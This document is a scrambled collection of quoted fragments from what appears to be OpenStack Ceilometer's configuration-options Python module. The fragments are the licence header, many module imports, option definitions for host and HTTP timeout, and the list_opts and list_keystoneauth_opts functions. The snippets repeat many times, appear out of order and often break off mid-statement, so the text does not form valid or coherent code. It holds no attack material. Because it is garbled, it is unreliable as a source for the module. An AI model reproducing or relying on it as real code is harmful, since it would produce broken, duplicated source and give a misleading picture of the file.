ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import", "import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import", "distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT #", "ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS),", "HTTP requests. Set it to None to ' 'disable timeout.'), ] def list_opts():", "ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client", "# not use this file except in compliance with the License. You may", "and v3 API # with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS),", "ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the", "limitations # under the License. import itertools import socket from keystoneauth1 import loading", "# License for the specific language governing permissions and limitations # under the", "ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "language governing permissions and limitations # under the License. 
import itertools import socket", "in writing, software # distributed under the License is distributed on an \"AS", "ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS),", "Version 2.0 (the \"License\"); you may # not use this file except in", "ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery", "('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file", "import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import", "ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification", "('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi',", "import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS,", "ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the", "\"License\"); you may # not use this file except in compliance with the", "ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains", "the Apache License, Version 2.0 (the \"License\"); you may # not use this", "2014 eNovance # # Licensed under the Apache License, Version 2.0 (the \"License\");", "# with discovery. But other options are possible. return [('service_credentials', ( loading.get_auth_common_conf_options() +", "not use this file except in compliance with the License. 
You may obtain", "must ' 'be a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600,", "('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration", "been removed due to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS,", "sample_default='<your_hostname>', help='Name of this node, which must be valid in an AMQP '", "For ZeroMQ only, must ' 'be a valid host name, FQDN, or IP", "License for the specific language governing permissions and limitations # under the License.", "a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS,", "the configuration file contains only the options # for the password plugin that", "ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control", "import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import", "identifier. For ZeroMQ only, must ' 'be a valid host name, FQDN, or", "License. import itertools import socket from keystoneauth1 import loading from oslo_config import cfg", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #", "that handles keystone v2 and v3 API # with discovery. But other options", "ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def", "OF ANY KIND, either express or implied. See the # License for the", "import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import", "import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import", "generated configfile # This have been removed due to a recursive import issue", "v2 and v3 API # with discovery. But other options are possible. return", "# FIXME(sileht): readd pollster namespaces in the generated configfile # This have been", "opaque identifier. For ZeroMQ only, must ' 'be a valid host name, FQDN,", "# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the", "an opaque identifier. 
For ZeroMQ only, must ' 'be a valid host name,", "ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware", "But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS,", "(the \"License\"); you may # not use this file except in compliance with", "of this node, which must be valid in an AMQP ' 'key. Can", "ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS,", "('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware',", "help='Timeout seconds for HTTP requests. Set it to None to ' 'disable timeout.'),", "namespaces in the generated configfile # This have been removed due to a", "FIXME(sileht): readd pollster namespaces in the generated configfile # This have been removed", "# for the password plugin that handles keystone v2 and v3 API #", "ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client", "# # Unless required by applicable law or agreed to in writing, software", "ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ]", "removed due to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS,", "('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS),", "itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), 
('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS),", "License. You may obtain # a copy of the License at # #", "the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR", "address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it to None to", "OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file',", "import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import", "handles keystone v2 and v3 API # with discovery. But other options are", "for the password plugin that handles keystone v2 and v3 API # with", "ANY KIND, either express or implied. See the # License for the specific", "ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi", "ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging", "import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [", "ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS),", "AMQP ' 'key. Can be an opaque identifier. For ZeroMQ only, must '", "itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http',", "for HTTP requests. Set it to None to ' 'disable timeout.'), ] def", "def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the options # for", "cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be valid in an", "import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import", "API # with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS,", "node, which must be valid in an AMQP ' 'key. 
Can be an", "import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import", "import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import", "ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift", "in the generated configfile # This have been removed due to a recursive", "import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import", "= [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be valid", "file contains only the options # for the password plugin that handles keystone", "under the Apache License, Version 2.0 (the \"License\"); you may # not use", "('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the", "WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See", "ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter',", "ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample", "it to None to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd", "' 'key. Can be an opaque identifier. 
For ZeroMQ only, must ' 'be", "('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the", "See the # License for the specific language governing permissions and limitations #", "import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import", "issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS,", "ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector", "from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import", "ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http", "law or agreed to in writing, software # distributed under the License is", "import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import", "with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS,", "ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host',", "ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only", "express or implied. See the # License for the specific language governing permissions", "keystone v2 and v3 API # with discovery. But other options are possible.", "ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils", "an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either", "# a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "CONDITIONS OF ANY KIND, either express or implied. 
See the # License for", "ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector", "to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces in", "# Copyright 2014 eNovance # # Licensed under the Apache License, Version 2.0", "import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import", "for the specific language governing permissions and limitations # under the License. import", "ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht):", "which must be valid in an AMQP ' 'key. Can be an opaque", "pollster namespaces in the generated configfile # This have been removed due to", "[ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS,", "v3 API # with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types',", "v3 API # with discovery. But other options are possible. return [('service_credentials', (", "('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the options", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi',", "'be a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import", "compliance with the License. 
You may obtain # a copy of the License", "ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS,", "import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import", "return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS,", "IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS),", "# with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS,", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware',", "import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import", "ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): #", "ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file", "import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS", "import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which", "seconds for HTTP requests. 
Set it to None to ' 'disable timeout.'), ]", "import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import", "must be valid in an AMQP ' 'key. Can be an opaque identifier.", "options # for the password plugin that handles keystone v2 and v3 API", "itertools import socket from keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager", "may # not use this file except in compliance with the License. You", "have been removed due to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS,", "ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector',", "ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS),", "ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher", "cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it to None to '", "' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces in the", "either express or implied. See the # License for the specific language governing", "help='Name of this node, which must be valid in an AMQP ' 'key.", "this file except in compliance with the License. You may obtain # a", "ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications", "import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(),", "or implied. See the # License for the specific language governing permissions and", "ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)),", "other options are possible. 
('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS,", "ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS),", "import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import", "timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces in the generated configfile", "import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import", "on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND,", "ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic", "itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS,", "ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)),", "def list_opts(): 